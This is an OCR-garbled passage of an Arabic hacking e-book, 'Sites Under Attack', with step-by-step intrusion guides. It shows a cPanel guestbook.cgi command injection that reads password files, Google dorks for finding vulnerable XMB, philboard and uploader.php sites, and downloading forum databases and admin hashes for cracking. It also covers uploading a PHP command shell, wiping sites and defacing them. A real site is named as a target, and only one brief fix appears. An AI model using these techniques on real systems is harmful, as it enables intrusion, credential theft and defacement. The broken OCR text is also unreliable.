http://www.*****.<strong>com</strong>/wihphoto/admin.php<br />

....<br />

ونضعالباسورد حق مدیرقاعدةالبیانات ونعدلفيالصور زي مانبغى<br />

هناك بع ضالأشخا صالذین یردیدونامتلاكالموقعكاملااواختراقهكاملا هناك بع ضالطرقلفعل ذلك<br />

:::<br />

أولا/ادخل عن طریقالأ فتيبي FTP وندخل الباسورد حقالمدیر واسمالمستخدم مو حقالصور<br />

بع ضالأحیانتنجحاذاكان الأسم والباسورد مطاب قللباسورد حق مل فالكونفج.‏<br />

ثانیا/‏ عن طریقالدخوللقاعدةالبیانات والعبفیها وامتلاك الموقع عن طریقها هناكبرامجتستطیع من<br />

خلالها الدخول علىقاعدةالبیانات مثلبرنامج MySQL Front وهوبرنامج جیدأو عن طریق<br />

الأكسس وغیرها منالطریق والبرامج<br />

٢٤٢


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

ثغرة في<br />

" php nuke<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$<br />

الكاتب:‏ ایسر<br />

$$$$$$$$<br />

فیهثغرهفيال php nuke<br />

مكانالصورهالشخصیه .......<br />

حبیتاقولكم علیها<br />

.. الثغره دي تتیحلكتنفیذاكوادالهتمل والجافابدل<br />

-<br />

!!!<br />

انا عار فانكماول ماتقرواالسطر الاولاكیدا غلبكم حیشتمنيباكثرالالفاظاباحه ‏-بس عاديانا متعود<br />

و یقولایه دهباههو مدخلنا هنا عشان یقولناتنفیذ اكواد هتمل و جافابدلالصورهالشخصیه ؟؟؟!!!!بس<br />

؟؟؟!!!اما عبیطاوي<br />

لكنفياخرالموضو ع حقولكم ممكنتعملوابیهاایه<br />

.....<br />

المهمان الثغرهكالتالي<br />

ساحاولانياعمل زي مواقع السیكیوریتيالمحترمهلمتیجيتعر ضثغره<br />

(<br />

) :<br />

الاصداراتالمصابه<br />

PHP Nuke versionh 6.0 والاقل منها<br />

الاستخدام<br />

:<br />

:<br />

تستخدمكماقلتفيتنفیذ اكواد الهتمل والجافا سكریب ت من خلال مكان صورهمالشخصیه.‏<br />

ملخ ص عامللثغره:‏<br />

..<br />

اي مستخدم عندم یقومبالتسجیلفيالمجلهفانه یطالبباختیار صوره شخصیه و ذلك من خلال مجموعه<br />

منالصورالموجودهفيالمجلد هذا....‏ /images/forum/avatars<br />

عندئذتقوم المجلهبوضعاسمالصورهفيالداتابیز .. ولكنها لاتقومبوضعايكودايانهاذااستطا ع<br />

اي یوزران ی حصل علىكودفورم المجله واستطا عان یغیر صندوقاختیارالصورهالشخصیهالى<br />

صندوق text عادي اذناعتقدانه ممكنان یكتبكود الهتمل اللي هوه عایزه<br />

الاكسبلویت:‏<br />

اولا علیك نتقومبالتسجیلفيالمجله والدخول بعد ذلك والذهابالى صفحه Your Account و منها<br />

الذهاب الى صفحه Your Info بعد ذلك علیكباظهار سورسكودالصفحه من خلال view source و<br />

الب حث عنكلمهuid<br />

لازمتلاقي حاجه زيكده<br />

!!!!<br />

<br />

:<br />

٢٤٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

كده یبقىانت عرفت رقمالاي دي اللي هوهفي المثالكان ... ٢<strong>١</strong><strong>١</strong><strong>١</strong><br />

علیك بعد ذلك نكتحفظالكود دهفيالنوتباد وتسمیه<br />

http://nukesite/ الى عنوان المجلهالهد ف<br />

اياسمبامتداد html<br />

:......<br />

مع ملاحظهتغییر<br />


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

خليبالكانفیه مسافه بعدالعلامه<br />

"


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

" ثغره في Bandmin 1.4<br />

$$$$$$$$$$$$<br />

الكاتب : حزمالظامي<br />

$$$$$$$$$$$$<br />

بسماالله الرحمن الرحیم.‏<br />

(( cPanel exploit not being fixed ))<br />

الحقیقة البدایة هذهالثغرهتم اكتشافها من مدة وقدتناقشتها معأخيالحبیبهیك س منأیام وقل تانشرها<br />

منباب الفائدة ولیحذراصحابالمواقع منها ...<br />

الثغره هيفي مدیر الباندویث<br />

المخاطر الجدیدة من سيبانل<br />

وهذه البرنامجیعطیكتفاصیل وإ حصائیات شهریة ‏...یمكن عن طریقهمعرفة جمیع المواقع على الخادم<br />

أیضاً‏ ویمكنأنتستثمربطرقأخرى<br />

) 1.4 ( Bandmin وهيثغره سيبانلكمااعتدنا هذهالایام على<br />

...<br />

عموماإذاتریدتنفذالثغرهفهذا مثاللها ...<br />

http://yourdomain.con/bandwidth/<br />

وطریقةإغلاقالثغرهكالتالي :<br />

وبكلاختصار ضع مل ف ) .htaccess ‏)في هذاالفولدر...‏<br />

/usr/local/bandmin/htdocs<br />

وإلیكم هذهالتفاصیل عن هذهالثغره......‏<br />

*************************<br />

Notice:<br />

Any Resellers or Dedicated hosts that use cPanel you should be aware<br />

that there is still an exploit people are using to see what domains are<br />

hosted on the server.<br />

If you have cPanel/WHM on your server, just go to your domain and put<br />

Hopefully you http://yourdomain.con/bandwidth//bandwidth/ after it.<br />

will get a “ You don't have permission to access /bandwidth/ on this<br />

server” message or it will ask for a password.<br />

Otherwise you will be at a page titled “ Bandmin 1.4 (what ever<br />

٢٤٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

version)” from here you can access the monthly stats with a list of all<br />

domains with over 1MB of transfer.<br />

The fix are listed below:<br />

Make a TXT file with these lines in it: Use your servers IP# for the XXX<br />

allow from xxx.xxx.xxx.xxx<br />

deny from all<br />

Name it .htaccess and place it in the servers /usr/local/bandmin/htdocs<br />

directory. This will block all but the IP that you use in the .htaccess file.<br />

*************************<br />

امافیوجدثغرةالسيبانلالتيلمیتم ذكرهالكناغلب المواقعاغلتهاالان<br />

cgi-sys/guestbook.cgi?user=cpanel&template<br />

تكتب هذا الراب ط بعداسمالموقع<br />

ولكن بعد علامة ‏=|تكتبالامرباللینكس |<br />

لأستعرا ضباسورد موقع علىالسیرفر<br />

مثلا<br />

/cgi-sys/guestbook.cgi?user=cpanel&template=|cat<br />

/home/XXX/public_html/_vti_pvt/service.pwd|<br />

وهذاالامرلكياسهل على البع ضاستعرا ض هذاالمل ف مع ملاحظة<br />

][ lsوهواستعرا ض مابداخلالمل ف][‏<br />

او][‏html php ض صفحه داخل مل ف سواءكانت catوهواستعرا ][<br />

ترى صلاحیاتكفي رؤیة هذهالصفحه ویمكنك ذالك عن طریق هذاالامر<br />

lsهذاالامریضهرلك -al الملفات ولو جیتتقراهبالتفصیل هواستعرا ض<br />

رؤیة الملفاتالتي یسمحلكبرؤیتهالو جیتتقولكی فاقولكتعال<br />

vi ][<br />

lsهواستعرا ض al وهو یضهرلكامامكل مل ف عدتفراغا تاذاكان<br />

اولفرا غفیها ‏×فماتقدرتشوفه<br />

ال حینبدخل معاكمفيتفصیل مملللأمر<br />

][=========][<br />

cat /home/XXX/public_html/_vti_pvt/service.pwd<br />

٢٤٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

][<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

][<br />

][<br />

][ catزي ما ذكرنا سابقا اللي هواستعرا ضالصفحات<br />

D عباره عنقسمفي هاردیسك سیرفرلینكس زیه زي homeهو ][<br />

او Cفيالویندوز<br />

][ public_html هذا هو عباره عن مل ف موجود داخلايا فتيبي لاي موقع<br />

فيالدنیا وهذاالمل ف مهم لانه داخلهتنح طالصفحات ولاحظو<br />

انه موجودفيالسیرفركل ملفاتال public_html لكلالمواقع<br />

اللي علىالسیرفر<br />

][ _vti_pvt وهو مل ف موجودهفیه ملفاتالفرون تبیج<br />

][ service.pwd وهوالمل فالليبیفیدكفي رؤیةكلباسوردات السیرفر مع<br />

یوزراتهابس بتكون مشفره ][<br />

][<br />

][<br />

XXX ][<br />

اسم الموقعالموجود علىالسیرفروترید رؤیت مل ف<br />

الفرون تبیجفیه<br />

-----------------------<br />

وبعد وجوودالباسوردات طبعا بتلااقیها مشفره<br />

لانها عباره عن ملفا ت service.pwdلانها ملفات الفرون تبیج<br />

اذا راحتلاقي:‏<br />

# -FrontPageadshhhhg:T_h1rTAnSmwck<br />

advrsgrent:yTPvsh2SKGI46<br />

# -FrontPagesfjhsdlj:KH5xpD5HGFQio<br />

# -FrontPagesdfQKG0nPulR5aY<br />

# -FrontPageafsdfgrica:7njMXh9/HImTA<br />

# -FrontPageaftergsdfsgnoo:wyXqflo6kr7TI<br />

را حتلقاه زيكذاكذا عادانت وشطارتك ببرنامج جوهن ذا ریبر بتفكالتشفیر<br />

------------------------<br />

اوكيال حینبیجي واحد موسوسبیقولفي نفسه طیبانا جبت الباسوردات ‏+الیوزرات<br />

كی فاعر فاسمالموقع<br />

اوكياقولكتعال حبیبي<br />

اكتبالامر ذا<br />

)) فعلاالوسوسهلهافایدةالیومینذي ((<br />

cat /etc/httpd/apache/conf/httpd.conf<br />

في هذا المل ف را ح یستعر ضلككلكبیره وصغیرهفيالسیرفر<br />

نبتديبشرح هذاالامر :<br />

٢ ٤٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

][ catتم ذكره ساااا ااابقاً][‏<br />

][ etc وهو عباره عن مل ف شبهامنيتخزنفیهالباسوردات وملفات<br />

اللوج والأشیاء المسموحبهافيالسیرفر<br />

][ httpd وهو مل فالمواقع الموجوده علىالسیرفر][‏<br />

مل ف یوجد داخلالمل فالامنيوتوجدبهمعلومات عن السیرفر<br />

ونوعه وكل شي یخت صبه<br />

][ conf وهواختصارلكلمة config وهو مل فبشكل عام یخت ص بكل ماهو<br />

سريبالموقع مثلالیوزر والباسوردللموقعاولقواعدالبیانات<br />

][ httpd.conf وهوالمل ف المطلوباللذي یوجدفیهكل شي خا صبالموقع<br />

اسمه والیوزر الخا صبه ومساحته على السیرفر وایمیل صاحبه ][<br />

][<br />

][<br />

][<br />

apache ][<br />

وهذااللي را حتلقاه<br />

PHP:<br />

ServerAlias w<br />

ww.NIGHTMARE.<strong>com</strong> NIGHTMARE.<strong>com</strong><br />

ServerAdmin [email]webmaster@NIGHTMARE.<strong>com</strong>[/email]<br />

DocumentRoot /home/NIGHTMARE/public_html<br />

BytesLog domlogs/NIGHTMARE.<strong>com</strong>-bytes_log<br />

User NIGHTMARE<br />

Group NIGHTMARE<br />

ServerName w<br />

ww.NIGHTMARE.<strong>com</strong><br />

CustomLog domlogs/NIGHTMARE<strong>com</strong> <strong>com</strong>bined<br />

ScriptAlias /cgi-bin/ /home/NIGHTMARE/public_html/cgi-bin<br />

اذالم یب قلك شئ اتكل علىاالله<br />

وفكالتشفیر<br />

شغلالا فتيبي وامسحالموقع وحطالاندكس<br />

والسلام ختاام...‏<br />

٢٤٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

ثغرة في نوع<br />

XMB من المنتدیات<br />

"<br />

$$$$$$$$$$$$$$$$<br />

الكاتب:‏ MaXhAk2000<br />

$$$$$$$$$$$$$$$$<br />

السلام علیكم ورحمةاالله وبركاته،،،‏<br />

اما بعد ((((((( فأناابرئ ذمتي مناياستخدام خاطئلهذهالغره ضداخواننا العرب،واالله على مااقول<br />

شهید))))))...‏<br />

بسماالله نبدأ،،،‏<br />

تعتبر المنتدیات من نوع xmb من المنتدیات التياكتسبت شهره واسعهفي مجالها وحالها حالالكثیر من<br />

الأنوا عالأخر ى من المنتدیات من وجود الثغرات والأختراقاتفلا یوجد شيءكامل على وجهالأر ضالااالله<br />

عز وجل..‏<br />

وص فللثغره::‏<br />

وقدتم اكتشا فثغره جدیدهفي هذاالنو ع من المنتدیات مما یمكنكانتكونالمدیر علىالمنتد ىاوتكون<br />

مشر فاوياي عضواخر<br />

الأصدارالمصاب:::‏<br />

XMB 1.6 Magic Lantern Final<br />

الشرح والتطبی ق:::‏<br />

جا وقت ال شغل والجد ‏>>>سوفاقوم بتقسیم الدرس على خطوات حتى یفهم ویكوناوووضح وأسهل :<br />

http://www.google.<strong>com</strong>/<br />

7-<br />

- ‎1‎علیكبالذهابالى موقع جوجل<br />

‏-‏‎2‎اكتبفي منطقةالب حثFinal XMB 1.6 Magic Lantern<br />

‏-‏‎3‎سو فترى منتدیاتكثییییییییره اكثرها مصابهبهذهالثغرهلكن رجاااء<br />

لاتقرب المنتدیاتالعربیة وعلیك بتحذیرها منالثغرهالموجوده.‏<br />

‏-‏‎4‎اضغط علىاي منتد ى وقم بكتابةالكلمة التالیة بعد عنوانالمنتدى<br />

index_log.logیعني راح یكون زيكده<br />

http://www.******.<strong>com</strong>/massegboard/index_log.log<br />

-5 راح ینزل عندك مل ف والمل ف عباره عن مل ف زيالكوكیزكبیر وفیهاسماء<br />

المستخدمین والباسورد وأشیاءثانیه ماتهمنا.‏<br />

- ‎6‎الأن علیكبالبحثفيالمنتدى عناسمالمدیر وذلكبالذهابالىالمواضیع<br />

وتشو فالأسماء واليتلقىتح تاسمهادمن ستریتورانسخاسمه.‏<br />

افتحالمل فالي نزلته من الموقع وسويب حث عناسمالمدیر راح یجیك زي<br />

كده مثلا::‏<br />

xmbuser=admin<br />

واباس را حتلقاهقدامه زيكده<br />

xmbpw=1faeb6747a31c854800ddf3c62b1717a<br />

-8 طبعاالباسفي هذهالحاله مشفر وفكالتشفیرصعبلهذا الغر ضقامت شركة<br />

٢٥٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

CCI بتصمیمبرنامج یقومبهذا الغر ض وهذهوصلتالبرنامج<br />

ftp://www.cafecounterintelligence.<strong>com</strong>/cci/chigger.exe<br />

‏-‏‎9‎اعدادتالبرنامج كتاليفيالصورة :<br />

رقم(‏ ‎<strong>١</strong>‎‏)قمبوضع علامة صح.‏<br />

رقم(‏‎٢‎‏)قمبوضعاسم العضو سواء مدیراو غیره<br />

رقم(‏ ‎٣‎‏)قمبوضعالباس المشفر حقالعضواوالمدیراو غیره<br />

رقم ‏(‏‎4‎‏)قمبوضع علامة صح.‏<br />

رقم(‏ ‎٥‎‏)قمبوضعالبروكسي اليتریدهاوالبروكسي حقمزوده الخدمه حقك<br />

رقم(‏ ‎٦‎‏)قمبوضعالمنفذ حقالبروكسي<br />

-10 بقي شيء واحد بعد اتمام الأعدادات حقت البرنامج بقيانتذهبالى<br />

المتصفحانترنتاكسبلورر ‏


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

شرح ثغرة<br />

" philboard<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$$<br />

Hi_HaCkEr<br />

$$$$$$$$$$$$$$<br />

الكاتب:‏<br />

سأذكراحدالثغراتفي بع ضاللغاتالدینامیكیة ( asp) active server pages<br />

طبعا هذهاللغة وللأ س فبهاثغرات عدیدة و خصوصافيالتعامل معقواعدبیاناتها<br />

.<br />

بشكل مختصر هذه اللغةتعتبر منلغات البرمجةالدینامیكیة التفاعلیةلبرمجة مواقعالانترنت ولها میزة<br />

بأن الكودلها مخفي<br />

وتعتمدقواعدبیاناتها علىثلاثةأنوا عهي<br />

:<br />

sqlserver && sql && M.S Access<br />

واماقاعدةبیانات ما یكروسوفتأكسسفثغراتها منأبس طالثغراتب حی ث انكاذا وجد تامتدادا واسم<br />

قاعدةالباناتفقطفانكتستطیعتحمیلها على جهازك مباشرة وتصفح جمیعالباسوردا تبسهولة ویسر<br />

وبدونتشفیرأیضا .<br />

والیكمالمثال منأحد المنتدیاتالتي تتضح جلیهبها هذهالثغرة وهيباسم philboard.asp<br />

مثل هذا المنتد ى http://www.khill.co.uk/forum/philboard.asp<br />

وطریقةایجاد مثل هذاالنو ع منتدیا تاذهبالى جوجلكما ذكرنا سابقا واب حث عن<br />

philboardوانتظر النتائج....‏<br />

> --------------<br />

-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br />

كی فتحملقاعدةالبیانا ت ؟<br />

اكتب هذاالامتداد<br />

وبعد ذلك حاولان یكونالمنتد ىبه عدیدقلیل منالمواضیع حتى یكون حجمقاعدةالبیانات صغیر جدا<br />

للتطبیق والتسلیمبسرعة<br />

وهذا هوامتداد واسمقاعدةالبیاناتلقاعدةالبیانات<br />

database/philboard.mdb<br />

وتكتبه بعداسمالموقع والمنتد ى مثل<br />

http://www.khill.co.uk/forum/database/philboard.mdb<br />

ولابدلكيتقراقاعدةالبیانا تان یكونفي جهازكبرنامج ما یكروسوفتأكسس<br />

وبعد فتحقاعدةالبیانات ستجدبداخلها عدة جداولفیعا جمیع محتویاتقاعدةالبیانات<br />

من ضمنها وهوالمهم جدولالمستخدمینال users<br />

٢٥٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

وستجداولاسم عالبا هو admin وهو اسمالمدیر العام معالباسوورد<br />

والحللهذهالثغرة ‏/هوتغییر مسارقواعدالبیاناتلكل منتد ى ‏.فكما رایناان منتدیات philboard.asp<br />

قواعدبیاناتها جمیعالها نفسالاسم والامتداد.....‏<br />

٢٥٣


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

"<br />

شرح ثغرة uploader.php<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

$$$$$$$$$$$$$$<br />

الكاتب Hi_HaCkEr:<br />

$$$$$$$$$$$$$$<br />

هيثغرةفيبرنامج uploader.php وهو متوفرباصدارة <strong>١</strong>٫<strong>١</strong> وتسمحلكبرفعاي مل فاوحتى<br />

سكربتا ت php<br />

وتستطیعتحمیله من http://www.phpscriptcenter.<strong>com</strong>/uploader.php<br />

الاسكربت مناسمهیتضحبانهیعطیك میزة رفع ملفاتلموقعك مباشرةلكن ‏((بوجودباسورد ))<br />

طیباذالم یكن محمى بباسوورداذاالسیرفركله سیصبحتح ت سیطرتكاذالم یكنفي حالة<br />

safe_modeامااذاكان سی ف مودفالموقعفقط سیصبحتح ت سیطرتك<br />

اذا حملت الملفلموقعكفقم بتغییر الباسووردوتستطیع عمل ذلك من مل ف setup.php<br />

openافتح setup.php and edit these options المل ف واستعر ض هذا الاعدادات<br />

--------------------------------------------------------------------------------------<br />

$ADMIN[RequirePass] = "Yes"; // Checks to see if upload has a vaild<br />

password<br />

$ADMIN[Password] = "password"; // This is the password if the above<br />

قم بتغییر الباسوورد منهنااا<br />

option is Yes<br />

$ADMIN[UploadNum] = "5"; // Number of upload feilds to put on the<br />

htmlعددالملفات<br />

page<br />

$ADMIN[directory] = "uploads"; // The directory the files will be<br />

(777 uploadedاسم to (must be chmoded to مجلد المل ف اتركهكماهواو غیرهفلك<br />

الخیار<br />

----------------------------------------------------------------------------------------<br />

طبعاانلم یكنالملف محمي بباسوورد فتستطیعتحمیلاي مل ف وسیكونبداخل<br />

فاذا رفعنها مثلا هذاالاسكربت<br />

مجلدuploads<br />

<br />

سنصللل cmd ونستطیعتنفیذاوامر علىالسیرفر ...... etc<br />

فاذا نفذنا<br />

٢٥٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

http://www.victim.<strong>com</strong>/uploads/shellemul.php?cmd=id<br />

سیكون الناتج مثلا<br />

uid=21(apache) gid=21(apache) groups=21(apache)<br />

طبعا هذا سكرب تبسی ط ولمزید منالرفاهیةارفع سكربتالشلاواي سكربت مماثلله واستمتع ‏(انلم<br />

یكنالسیرفرفي حالة سی ف مود (<br />

طریقةالب حث عن هذه الثغرة<br />

ابحثفي جوجل متبعا هذهالطریقة<br />

allinurl: uploader.php<br />

وستر ى النتائج<br />

وختاما اتمنىان یكون الموضو ع مفیداللجمیع.........‏<br />

٢٥٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

أفضل المنتدیات العربیة للهاكر<br />

"<br />

$$$$$$$$$$$$$$$$<br />

الكاتب MaXhAk2000:<br />

$$$$$$$$$$$$$$$$<br />

أقدلكمأفضل المواقع والمنتدیاتالعربیةفي مجالالهاكبجمیع مجالته على حدمعرفتي:::‏<br />

.<strong>١</strong><br />

.٢<br />

.٣<br />

.٤<br />

.٥<br />

.٦<br />

.٧<br />

.٨<br />

.٩<br />

.<strong>١</strong>٠<br />

منتدیات العاصفة منظمة هاي هكر<br />

منتد ى شبكةالحزمالإ سلامیة.‏<br />

منتد ىابن مصر.‏<br />

منتد ىالعقربالأحمر http://www.redstaing.ocm<br />

منتدىإعصار.‏<br />

منتد ىمعتز ن ت.‏<br />

منتد ىهاكرفلسطین.‏<br />

موقع<br />

منتد ى نجم دوس.‏ http://www.naajm.<strong>com</strong>/<strong>vb</strong><br />

منتدىامبراطوریةالعرب<br />

http://<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong> (<br />

)<br />

http://www.7azm.net/<strong>vb</strong>/<br />

http://www.ebnmasr.net/<strong>vb</strong>/<br />

http://www.e3sar.<strong>com</strong>/<strong>vb</strong>/<br />

http://www.emoataz.<strong>com</strong>/<strong>vb</strong>/<br />

http://www.h4palestine.<strong>com</strong>/<br />

http://www.pharaonics.net/<br />

http://www.arabse.net/forums/<br />

هذه افضل مارأیتهوتصفحته عن المواقعالعربیة التيتدعم علم الهاك...‏<br />

٢٥٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

أفضل مواقع الأمن والهاك الإنجلیزیة<br />

"<br />

$$$$$$$$$$$$$$$$<br />

الكاتب MaXhAk2000:<br />

$$$$$$$$$$$$$$$$<br />

هذه بع ض المواقع المهمةالتي یستخدمهاالهكرلمعرفةاخر الثغراتالصادره مع مقالا تبسیطلهذه<br />

المواقع<br />

موقعSecurity Packet Storm<br />

----------------------<br />

العنوان : http://packetstorm.securify.<strong>com</strong>/<br />

واحد مناكبرقواعد البیاناتالتيتحمل كعلومات متعلقةبالأمن<br />

انا افضل الذهابالى هذاالموقع مرهفيالیوملقراءةقسم Today' 'New Files سواءاللب حث عن<br />

ثغراتمعینهاولأ.‏<br />

اوجد الارشی ف عن طریق Ken Williams حیثان هذاالموقع یستهلك مئاتالالو ف منالنقراتكل<br />

اسبو ع<br />

حالیاانتقلت ملكیتهالى مالك ) Kroll-O-Nagra (.http://www.securify.<strong>com</strong>/<br />

موقعFocus Security<br />

----------------<br />

العنوان : http://www.securityfocus.<strong>com</strong>/<br />

قاعدةبیاناتاخر ىكاملة . تتحد ث یومیافهؤلاء الشبابالقائمون على هذا الموقع لا ینامونابدا!‏<br />

BugTraq<br />

--------<br />

: مستضیفه موقع(‏ http://www.securityfocus.<strong>com</strong>/ Security Focus ‏),وسابقا<br />

كان مستضیفة ) (Netspace .(http://www.netspace.org/<br />

العنوان<br />

BugTraqواحدة منافضلقائمة المراسلات البریدیة mailing list التي تتهتمبالامنالالكتروني<br />

هذه القائمة یقوم علیها رئی ساسمه (aleph1@underground.org). Aleph1‎یستقبل الرسائل<br />

التيترسلها ( عنثغرةمعینه مثلا ( ویقوم بت حلیلهاوتنضیفها منال spamsوالرسائلالتيلیسلها<br />

فائدةاو الثغرات القدیمةثم یقومبإرسال الرسالهالممتازهفق ط الى جمیعالمشتركینفي القائمة<br />

انص حكبالتسجیل<br />

تستطیعایضاالبحثفيارشیفاتهاالتيتعتبرلدي منافضلقواعدالبیانات وذلك عن طریق دخول الموقع<br />

ثم الب حث عن رابط'‏search‏'‏<br />

http://www.securityfocus.<strong>com</strong>/<br />

الب حثSearching<br />

------------<br />

اذاكنتترید الب حث عنثغرة متعلقةبخدمهمعینة مثلا Sendmailفستحتاجلكتابت 8.8.3<br />

local DoS حث عنثغرهمعینه مثلا هجوم حجب الخدمه sendmail‏'واذااردتالب '8.8.3<br />

نسخه<br />

فما علیكالا كتابتالتالي sendmail' 'local DoS ‏:بدون علامات<br />

ضداي<br />

الاقتباس .<br />

من sendmail<br />

وهذه بع ض المواقعالاخرى:::‏<br />

٢٥٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

http://rootshell.redi.tk/<br />

موقع http://www.ussrback.<strong>com</strong><br />

http://www.insecure.org/sploits.html<br />

http://www.linux.<strong>com</strong>.cn/hack.co.za<br />

موقع<br />

موقع<br />

موقع<br />

.<strong>١</strong><br />

.٢<br />

.٣<br />

.٤<br />

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=<br />

=<br />

أمابالنسبةلمواقع الهاكالإنجلیزیةفمعرفتيبها ضئیلة لعدمتوسعيفي اللغةالإنجلیزیة،‏ وهذه المواقع<br />

كالتالي:::‏<br />

موقع<br />

موقع<br />

موقع<br />

http://www.haker.<strong>com</strong>.pl<br />

http://www.webattack.<strong>com</strong>/<br />

http://blacksun.box.sk<br />

موقع http://www.blackcode.<strong>com</strong><br />

.<strong>١</strong><br />

.٢<br />

.٣<br />

.٤<br />

...<br />

٢٥٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

الخاتمة<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

نحمداالله ونشكره علىان وفقنا لإتمام هذاالكتاب والذي لانرجوا من وراءهالاالخیر والثواب<br />

فلاتنسونا من دعوةفي ظهرالغیبلنا ولإ خوانناالمسلمینفيكل مكان.‏<br />

لكن ننوه هنا اللا شيءقد یقول البع ض هذاالكتاب لا یحتوي على شرو حللثغرات ومن هذاالقابیل<br />

لكن نقول ن حنأنه یجبفيالبدایةالتأسیس ومنثم ینطلق الشخ صفي هذا العلم الذي لا ینتهى<br />

ویفقه نفسهبنفسه،،‏ وأیضاأنالثغراتلها وقت محددوت نتهي ویتمترقیعالكن شرحنا بعضها منأجلباب<br />

العلمبالشيء وللإ ستفادة لا غیر...‏<br />

هذا وصلىاالله على النبي الختار محمدابن عبداالله عدد ماتراكمتالسحب وعدد ماتزاخرتالنجوم<br />

والسلام علیكم ورحمةاالله وبركاته،،،‏<br />

...<br />

++++++++++++++++++++++++<br />

+<br />

+ Hi_hacker@hotmail.<strong>com</strong><br />

+ Maxhak2000@hotmail.<strong>com</strong><br />

++++++++++++++++++++++++<br />

أياستفسارأو نصیحهیرجى مراسلة:-‏<br />

٢٥٩

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!